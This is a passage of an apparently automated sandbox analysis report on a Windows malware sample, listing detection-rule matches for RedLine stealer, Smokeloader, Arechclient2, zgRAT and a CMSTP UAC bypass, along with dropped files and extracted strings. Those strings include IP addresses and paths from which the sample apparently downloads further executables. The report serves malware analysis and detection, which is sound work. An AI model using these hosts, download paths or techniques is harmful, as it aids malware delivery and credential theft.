                          Source: wxfSIz4PAi.exe, 00000000.00000003.1777004508.0000000005E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1767071882.0000000005E04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1774683419.0000000005DFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779989651.0000000005E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.00000000075F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1767133423.0000000005E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1778539845.0000000005E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1773287764.0000000005E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1767166247.0000000005E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1773145886.0000000005E01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1779536383.0000000005E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000002.1987404213.0000000005E35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exe, 00000000.00000003.1773342257.0000000005E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs wxfSIz4PAi.exe
                          Source: wxfSIz4PAi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 00000001.00000002.2160863373.00000000042D4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, WindowsIdentityProvider.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.csSecurity API names: System.IO.DirectoryInfo.GetAccessControl()
                          Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2721bb00000.6.raw.unpack, ApplicationFolderProvider.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBD7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6BBD7030
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001AD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,2_2_001AD660
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F5BD6 CreateToolhelp32Snapshot,Module32First,0_2_040F5BD6
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,0_2_0042628B
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_00188040 LoadResource,LockResource,SizeofResource,2_2_00188040
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeMutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.0.exeJump to behavior
                          Source: Yara matchFile source: 6.0.u5ek.3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1819490382.00000000071F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.1817573323.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: two0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: two0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: two0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: Installed0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: Installed0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .zip0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .zip0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: \run.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: \run.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_00424A0E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: @0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.900_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: Installed0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: Installed0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2030_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.590_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /timeSync.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /syncUpd.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /1/Package.zip0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .zip0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .zip0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: \run.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: \run.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: 185.172.128.2280_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: /BroomSetup.exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_05B84C75
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCommand line argument: .exe0_2_05B84C75
                          Source: wxfSIz4PAi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: u5ek.0.exe, u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: u5ek.0.exe, 00000001.00000003.1759342949.00000000245B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: u5ek.0.exe, 00000001.00000002.2206184854.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2173534479.000000001E637000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: wxfSIz4PAi.exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile read: C:\Users\user\Desktop\wxfSIz4PAi.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\wxfSIz4PAi.exe "C:\Users\user\Desktop\wxfSIz4PAi.exe"
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe"
